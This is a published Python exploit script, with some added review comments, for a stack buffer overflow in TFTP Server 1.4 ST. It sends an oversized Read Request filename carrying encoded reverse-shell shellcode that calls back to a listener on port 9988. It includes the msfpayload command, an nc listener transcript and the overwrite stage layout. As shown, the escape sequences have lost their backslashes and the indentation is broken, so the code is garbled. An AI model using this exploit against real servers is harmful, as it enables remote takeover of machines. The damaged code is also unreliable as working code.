# Title : TFTP Server 1.4 ST (RRQ) Buffer Overflow Exploit
# Published : 2012-01-10
# Author :
#!/usr/bin/python
#---------------------------------------------------------------------------#
# Exploit: TFTP SERVER V1.4 ST (RRQ Overflow) #
# OS: Windows XP PRO SP3 #
# Author: b33f #
#---------------------------------------------------------------------------#
# Smashing the stack for fun and practice... #
# #
# This TFTP service has been pwned extensively: #
# (1) Muts ==> WRQ Overflow #
# http://www.exploit-db.com/exploits/5314/ #
# (2) Molotov ==> WRQ Overflow #
# http://www.exploit-db.com/exploits/10542/ #
# (3) tixxDZ ==> ERROR Overflow #
# http://www.exploit-db.com/exploits/5563/ #
# #
# Vulnerable software: #
# http://www.exploit-db.com/application/5314/ #
#---------------------------------------------------------------------------#
# After some simple fuzzing with SPIKE, I discovered that sending a Read #
# Request (RRQ) packet can also trigger a buffer overflow... #
#---------------------------------------------------------------------------#
# It might take up to 30 seconds for some reason but the shell does appear #
# as expected.... #
# #
# root@bt:~# nc -lvp 9988 #
# listening on [any] 9988 ... #
# 192.168.111.128: inverse host lookup failed: Unknown server error #
# connect to [192.168.111.132] from (UNKNOWN) [192.168.111.128] 1072 #
# Microsoft Windows XP [Version 5.1.2600] #
# (C) Copyright 1985-2001 Microsoft Corp. #
# #
# C:\Program Files\TFTPServer> #
#---------------------------------------------------------------------------#
import socket
import sys
# Target address and the well-known TFTP port (UDP/69). Both are hard-coded;
# the address is the lab host that appears in the header transcript.
host = '192.168.111.128'
port = 69
# Python 2 syntax throughout (print statement below); this will not run
# unmodified on Python 3. The try/except bodies are not indented as shown,
# which is a syntax error in any Python version -- presumably lost during
# extraction of the page.
try:
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
# Bare except also swallows KeyboardInterrupt/SystemExit; `except socket.error`
# would be the narrow form.
except:
print "socket() failed"
sys.exit(1)
#msfpayload windows/shell_reverse_tcp LHOST=192.168.111.132 LPORT=9988 R| msfencode -b 'x00'
#x86/shikata_ga_nai succeeded with size 341 (iteration=1)
# Encoded reverse-shell payload pasted as a string literal.
# NOTE(review): every escape sequence on this page has lost its backslash
# (e.g. "xbb" is the three ASCII characters x, b, b, not the byte 0xBB), so as
# written this literal is plain text and its len() is not the 341 bytes the
# comment above reports.
shell = (
"xbbx3cxefxdbxc5xdbxddxd9x74x24xf4x5ax29xc9xb1"
"x4fx31x5ax14x83xc2x04x03x5ax10xdex1ax27x2dx97"
"xe5xd8xaexc7x6cx3dx9fxd5x0bx35xb2xe9x58x1bx3f"
"x82x0dx88xb4xe6x99xbfx7dx4cxfcx8ex7ex61xc0x5d"
"xbcxe0xbcx9fx91xc2xfdx6fxe4x03x39x8dx07x51x92"
"xd9xbax45x97x9cx06x64x77xabx37x1exf2x6cxc3x94"
"xfdxbcx7cxa3xb6x24xf6xebx66x54xdbxe8x5bx1fx50"
"xdax28x9exb0x13xd0x90xfcxffxefx1cxf1xfex28x9a"
"xeax75x43xd8x97x8dx90xa2x43x18x05x04x07xbaxed"
"xb4xc4x5cx65xbaxa1x2bx21xdfx34xf8x59xdbxbdxff"
"x8dx6dx85xdbx09x35x5dx42x0bx93x30x7bx4bx7bxec"
"xd9x07x6exf9x5bx4axe7xcex51x75xf7x58xe2x06xc5"
"xc7x58x81x65x8fx46x56x89xbax3exc8x74x45x3exc0"
"xb2x11x6ex7ax12x1axe5x7ax9bxcfxa9x2ax33xa0x09"
"x9bxf3x10xe1xf1xfbx4fx11xfaxd1xf9x16x6dx1ax51"
"xf7xeaxf2xa0x07xd4x06x2cxe1x70x17x78xbaxecx8e"
"x21x30x8cx4fxfcxd0x2dxddx9bx20x3bxfex33x77x6c"
"x30x4ax1dx80x6bxe4x03x59xedxcfx87x86xcexcex06"
"x4ax6axf5x18x92x73xb1x4cx4ax22x6fx3ax2cx9cxc1"
"x94xe6x73x88x70x7exb8x0bx06x7fx95xfdxe6xcex40"
"xb8x19xfex04x4cx62xe2xb4xb3xb9xa6xc5xf9xe3x8f"
"x4dxa4x76x92x13x57xadxd1x2dxd4x47xaaxc9xc4x22"
"xafx96x42xdfxddx87x26xdfx72xa7x62")
#---------------------------------------------------------------------------#
# (1) Stage1: 0x00409605 TFTPServer.exe - PPR #
# => 3-byte overwrite using the mandatory protocol null-byte. #
# (2) Stage2: jump back 5-bytes "xEBxF9" so we have room for a far jump. #
# (3) Stage3: jump back 1490-bytes to the beginning of our buffer. #
# (4) Stage4: reverse shell port 9988 - size 341 #
#---------------------------------------------------------------------------#
# Stage layout as described in the block above. The same stripped-backslash
# caveat applies: "x90"*50 here is 150 ASCII characters rather than 50 NOP
# bytes, so the padding arithmetic on the `filename` line below assumes one
# byte per escape and does not hold for this text.
stage4 = "x90"*50 + shell
stage3 = "xE9x2ExFAxFFxFF"
stage2 = "xEBxF9x90x90"
stage1 = "x05x96x40"
# Pad the filename field to a fixed total length, then append the three
# trailing stages.
filename = stage4 + "A"*(1487-len(stage4)) + stage3 + stage2 + stage1
mode = "netascii"
# TFTP request layout (RFC 1350): opcode (1 = RRQ), filename, NUL, mode, NUL.
# The only abnormal thing about this datagram is the size of its filename
# field -- roughly 1.5 KB where real filenames are a few dozen bytes -- which
# is exactly what a bounds check on the server, or a size threshold on UDP/69
# requests in an IDS rule, would catch.
youlose = "x00x01" + filename + "x00" + mode + "x00"
# A single datagram; nothing is read back, and the socket is never closed.
s.sendto(youlose, (host, port))